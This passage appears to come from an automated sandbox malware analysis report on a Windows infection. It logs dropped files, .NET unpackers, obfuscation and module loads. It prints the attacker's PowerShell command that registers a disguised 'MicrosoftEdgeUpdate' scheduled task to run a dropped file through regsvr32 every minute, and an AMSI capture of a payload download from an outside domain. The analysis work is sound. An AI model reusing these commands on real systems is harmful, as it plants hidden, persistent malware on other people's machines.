Source: C:\Windows\System32\regsvr32.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: cryptnet.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: webio.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sxs.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: devenum.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: winmm.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: devobj.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: msdmo.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat File written: C:\Users\user\AppData\Roaming\4smg.ini Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\7.0\Outlook\Profiles\Outlook Jump to behavior
Source: Binary string: kernel32.pdbUGP source: regsvr32.exe, 00000007.00000003.1500277385.000000001C6C0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1500391126.000000001C780000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1510388367.000001BD87830000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: kernelbase.pdbUGP source: regsvr32.exe, 00000007.00000003.1501970483.000000001C9A0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1500890614.000000001C6C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1512321032.000001BD87B10000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1511290183.000001BD87830000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: OpenWith.exe, 0000000B.00000003.1615770138.000001BD880BF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000007.00000003.1499112510.000000001C8B0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1497909811.000000001C6C0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000007.00000003.1499112510.000000001C8B0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1497909811.000000001C6C0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: kernel32.pdb source: regsvr32.exe, 00000007.00000003.1500277385.000000001C6C0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1500391126.000000001C780000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, OpenWith.exe, 0000000B.00000003.1510388367.000001BD87830000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: winload_prod.pdb source: OpenWith.exe, 0000000B.00000003.1615770138.000001BD880F7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winload_prod.pdbsAlarms^ source: OpenWith.exe, 0000000B.00000003.1615770138.000001BD880C7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdbPX6 source: OpenWith.exe, 0000000B.00000003.1615770138.000001BD880C7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: OpenWith.exe, 0000000B.00000003.1615770138.000001BD880EF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: kernelbase.pdb source: regsvr32.exe, 00000007.00000003.1501970483.000000001C9A0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1500890614.000000001C6C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, OpenWith.exe, 0000000B.00000003.1512321032.000001BD87B10000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1511290183.000001BD87830000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: 7.2.regsvr32.exe.13129ac0.3.raw.unpack, Redist.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 7.2.regsvr32.exe.13129ac0.3.raw.unpack, Redist.cs .Net Code: CoreMain
Source: 7.3.regsvr32.exe.2d84fa0.6.raw.unpack, Redist.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 7.3.regsvr32.exe.2d84fa0.6.raw.unpack, Redist.cs .Net Code: CoreMain
Source: 7.2.regsvr32.exe.2d84fa0.0.raw.unpack, Redist.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 7.2.regsvr32.exe.2d84fa0.0.raw.unpack, Redist.cs .Net Code: CoreMain
Source: 7.3.regsvr32.exe.2d84fa0.7.raw.unpack, Redist.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 7.3.regsvr32.exe.2d84fa0.7.raw.unpack, Redist.cs .Net Code: CoreMain
Source: 7.2.regsvr32.exe.1b880000.4.raw.unpack, Redist.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 7.2.regsvr32.exe.1b880000.4.raw.unpack, Redist.cs .Net Code: CoreMain
Source: 11.3.OpenWith.exe.1bd8822aa00.10.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 11.3.OpenWith.exe.1bd8822aa00.10.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 11.3.OpenWith.exe.1bd8822aa00.8.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 11.3.OpenWith.exe.1bd8822aa00.8.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 11.3.OpenWith.exe.1bd8822aa00.32.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 11.3.OpenWith.exe.1bd8822aa00.32.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 11.3.OpenWith.exe.1bd8822aa00.47.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 11.3.OpenWith.exe.1bd8822aa00.47.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 11.3.OpenWith.exe.1bd8822aa00.40.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 11.3.OpenWith.exe.1bd8822aa00.40.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 11.3.OpenWith.exe.1bd8822aa00.37.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 11.3.OpenWith.exe.1bd8822aa00.37.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 11.3.OpenWith.exe.1bd8822aa00.43.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 11.3.OpenWith.exe.1bd8822aa00.43.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 11.3.OpenWith.exe.1bd8822aa00.20.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 11.3.OpenWith.exe.1bd8822aa00.20.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 11.3.OpenWith.exe.1bd8822aa00.24.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 11.3.OpenWith.exe.1bd8822aa00.24.raw.unpack, Runtime.cs .Net Code: CoreMain
Suspicious powershell command line found
Source: C:\Users\Public\ajbs50ul.bat Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{C804C8C0-8CC0-4804-C048-00888CC0048C}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
Source: C:\Windows\System32\rekeywiz.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/oSyU.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{848CC004-CC00-4888-C000-44488CCC0488}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
Source: C:\Users\Public\ajbs50ul.bat Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{C804C8C0-8CC0-4804-C048-00888CC0048C}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)" Jump to behavior
Source: C:\Windows\System32\rekeywiz.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/oSyU.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{848CC004-CC00-4888-C000-44488CCC0488}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
PE file contains sections with non-standard names
Source: utox_x86_x64.exe.1.dr Static PE information: section name: .rodata
Source: utox_x86_x64.exe.1.dr Static PE information: section name: .xdata
Source: utox_x86_x64.exe.1.dr Static PE information: section name: /4
Source: utox_x86_x64.exe.1.dr Static PE information: section name: /19
Source: utox_x86_x64.exe.1.dr Static PE information: section name: /31
Source: utox_x86_x64.exe.1.dr Static PE information: section name: /45
Source: utox_x86_x64.exe.1.dr Static PE information: section name: /57
Source: utox_x86_x64.exe.1.dr Static PE information: section name: /70
Source: utox_x86_x64.exe.1.dr Static PE information: section name: /81
Source: utox_x86_x64.exe.1.dr Static PE information: section name: /92
Source: ajbs50ul.bat.1.dr Static PE information: section name: .xdata
Source: 4smg.ini.3.dr Static PE information: section name: .xdata
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFAAC33D2A5 pushad ; iretd 4_2_00007FFAAC33D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFAAC457962 push ebx; retf 4_2_00007FFAAC45796A
Source: C:\Windows\System32\regsvr32.exe Code function: 7_3_02F340F7 push eax; ret 7_3_02F340FB
Source: C:\Windows\System32\regsvr32.exe Code function: 7_3_02F362E3 push ebx; ret 7_3_02F362E6
Source: C:\Windows\System32\regsvr32.exe Code function: 7_3_02F35ED9 push esi; ret 7_3_02F35EDD
Source: C:\Windows\System32\regsvr32.exe Code function: 7_3_02F34EB2 pushad ; retf 7_3_02F34EB3
Source: C:\Windows\System32\regsvr32.exe Code function: 7_3_02F348BE push eax; retf 7_3_02F348BF
Source: C:\Windows\System32\regsvr32.exe Code function: 7_3_02F31865 push cs; ret 7_3_02F318C4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_3_02F35643 push eax; retf 7_3_02F35645
Source: C:\Windows\System32\regsvr32.exe Code function: 7_3_02F34427 pushad ; ret 7_3_02F34428
Source: C:\Windows\System32\regsvr32.exe Code function: 7_3_02F36C12 push edx; retf 7_3_02F36C26
Source: C:\Windows\System32\regsvr32.exe Code function: 7_3_02F3220B push eax; iretd 7_3_02F32224
Source: C:\Windows\System32\regsvr32.exe Code function: 7_3_02F359E3 push esi; retf 7_3_02F359E6
Source: C:\Windows\System32\regsvr32.exe Code function: 7_3_02F335EC push esi; ret 7_3_02F335ED
Source: C:\Windows\System32\regsvr32.exe Code function: 7_3_02F317D5 push cs; ret 7_3_02F318C4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_3_02F3430B push eax; retf 7_3_02F3430C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_02F340F7 push eax; ret 7_2_02F340FB
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_02F362E3 push ebx; ret 7_2_02F362E6
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_02F35ED9 push esi; ret 7_2_02F35EDD
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_02F34EB2 pushad ; retf 7_2_02F34EB3
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_02F348BE push eax; retf 7_2_02F348BF
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_02F31865 push cs; ret 7_2_02F318C4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_02F35643 push eax; retf 7_2_02F35645
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_02F34427 pushad ; ret 7_2_02F34428
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_02F36C12 push edx; retf 7_2_02F36C26
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_02F3220B push eax; iretd 7_2_02F32224
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_02F359E3 push esi; retf 7_2_02F359E6
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_02F335EC push esi; ret 7_2_02F335ED
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_02F317D5 push cs; ret 7_2_02F318C4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_02F3430B push eax; retf 7_2_02F3430C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_1C0DA41B pushad ; iretd 7_2_1C0DA536
Drops PE files
Source: C:\Windows\System32\rekeywiz.exe File created: C:\Users\user\AppData\Roaming\oSyU.ini Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Desktop\utox_x86_x64.exe Jump to dropped file
Source: C:\Users\Public\ajbs50ul.bat File created: C:\Users\user\AppData\Roaming\4smg.ini Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\ajbs50ul.bat Jump to dropped file
Drops PE files to the user directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\ajbs50ul.bat Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\ajbs50ul.bat Jump to dropped file
Source: C:\Users\Public\ajbs50ul.bat File created: C:\Users\user\AppData\Roaming\4smg.ini Jump to dropped file
Source: C:\Windows\System32\rekeywiz.exe File created: C:\Users\user\AppData\Roaming\oSyU.ini Jump to dropped file

Boot Survival
barindex
Drops PE files to the user root directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\ajbs50ul.bat Jump to dropped file
Powershell creates an autostart link
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'utox_x86_x64.exe') -oulv 'htv7i9rockp24tdocs.lol/utox_x86.p24xp24';exit@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module via navigations and search. Tags = @('powershell','unit testing','bdd','tdd','mocking') # The web address of an icon

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
